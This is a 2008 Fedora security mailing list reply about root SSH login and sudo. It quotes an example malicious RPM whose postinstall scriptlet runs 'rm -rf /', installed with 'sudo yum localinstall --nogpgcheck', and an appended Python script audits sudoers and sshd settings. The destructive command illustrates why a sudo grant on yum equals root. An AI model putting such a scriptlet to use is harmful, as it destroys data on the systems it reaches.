Re: Security Changes For Fedora 9

On Monday 14 January 2008, Eric Rannaud wrote:
> On Jan 10, 2008 10:26 PM, Ville Skyttä <ville.skytta@xxxxxx> wrote:
> > On Saturday 05 January 2008, Kevin Fenzi wrote:
> > > I find root ssh login handy for a number of reasons:
> >
> > [...]
> >
> > > - It's nice to be able to do for automated tasks (like say installing a
> > > single new package on 20 machines without having to login and sudo on
> > > each).
> >
> > "ssh -t $host sudo yum install $package" works for me...
>
> What about (supposing I know the password of non-root user 'foo', and
> assuming that 'foo' can sudo yum):
>
> [hacker@tooeasy]$ rpm -q --scripts hacker_pkg.rpm
> postinstall scriptlet (using /bin/sh):
> rm -rf /
> exit 0
> [hacker@tooeasy]$ scp -p hackers_pkg.rpm foo@host:
> [hacker@tooeasy]$ ssh -t foo@host sudo yum localinstall --nogpgcheck
> ./hackers_pkg.rpm
>
> Am I wrong in assuming that yum is not necessarily a safe command to
> be used with sudo?

Not at all.

> Or more exactly, that there is no point in blocking 
> root ssh logins if you're going to let a user that can login remotely
> use sudo on yum?

Well, I was responding to the "convenience of automation" part, demonstrating 
that root SSH access is not needed for that, it can be done pretty much as 
easily with sudo; not to the security aspects per se.  But I suppose using an 
arbitrary username for those tasks instead of root and blocking direct root 
SSH (with password authentication) could make things somewhat harder for 
brute forcers.

--
Fedora-security-list mailing list
Fedora-security-list@xxxxxxxxxx
https://www.redhat.com/mailman/listinfo/fedora-security-list
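
The point made in the thread, that a sudo grant on yum is as good as root and that direct root SSH with password authentication is a separate exposure, can be checked on a host's configuration. The following is an added example, not part of the original messages: it reads a simplified subset of sudoers syntax (one user specification per line, no aliases or escaped commas), the sample files are constructed, and the sshd defaults it falls back to are an assumption.

```python
import posixpath
import re

# Commands that run package scriptlets as root: a sudo grant on them equals a root shell.
ROOT_EQUIVALENT = {"yum", "rpm"}

# Constructed sample files, not taken from the thread.
SUDOERS = """\
Defaults    requiretty
foo     ALL = (root) /usr/bin/yum
bar     ALL = (root) NOPASSWD: /usr/bin/yum install *, /sbin/service httpd restart
backup  ALL = (root) /usr/bin/rsync
"""
SSHD_CONFIG = """\
PermitRootLogin yes
PasswordAuthentication yes
"""

def root_equivalent_grants(sudoers_text):
    """Return sorted (user, command) pairs where sudo grants a package manager."""
    findings = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")) or "=" not in line:
            continue
        who, spec = line.split("=", 1)
        user = who.split()[0]
        spec = re.sub(r"^\s*\([^)]*\)", "", spec)   # drop the (runas) list
        spec = re.sub(r"\b[A-Z_]+:", "", spec)      # drop tags such as NOPASSWD:
        for cmd in spec.split(","):
            words = cmd.split()
            if words and posixpath.basename(words[0]) in ROOT_EQUIVALENT:
                findings.append((user, words[0]))
    return sorted(findings)

def root_password_login_allowed(sshd_text):
    """True if these settings let root authenticate over SSH with a password."""
    # Assumed defaults when a keyword is absent (the older OpenSSH behaviour).
    opts = {"permitrootlogin": "yes", "passwordauthentication": "yes"}
    seen = set()
    for line in sshd_text.splitlines():
        words = line.split()
        if len(words) >= 2 and words[0].lower() in opts and words[0].lower() not in seen:
            seen.add(words[0].lower())          # sshd keeps the first value it reads
            opts[words[0].lower()] = words[1].lower()
    return opts["permitrootlogin"] == "yes" and opts["passwordauthentication"] == "yes"

if __name__ == "__main__":
    for user, cmd in root_equivalent_grants(SUDOERS):
        print(f"{user}: sudo {cmd} is root-equivalent (package scriptlets run as root)")
    print("root password login over SSH:", root_password_login_allowed(SSHD_CONFIG))
```

Restricting the sudoers entry to `yum install *` does not change the finding, because the arguments still let the caller choose which package, and therefore which scriptlets, run as root.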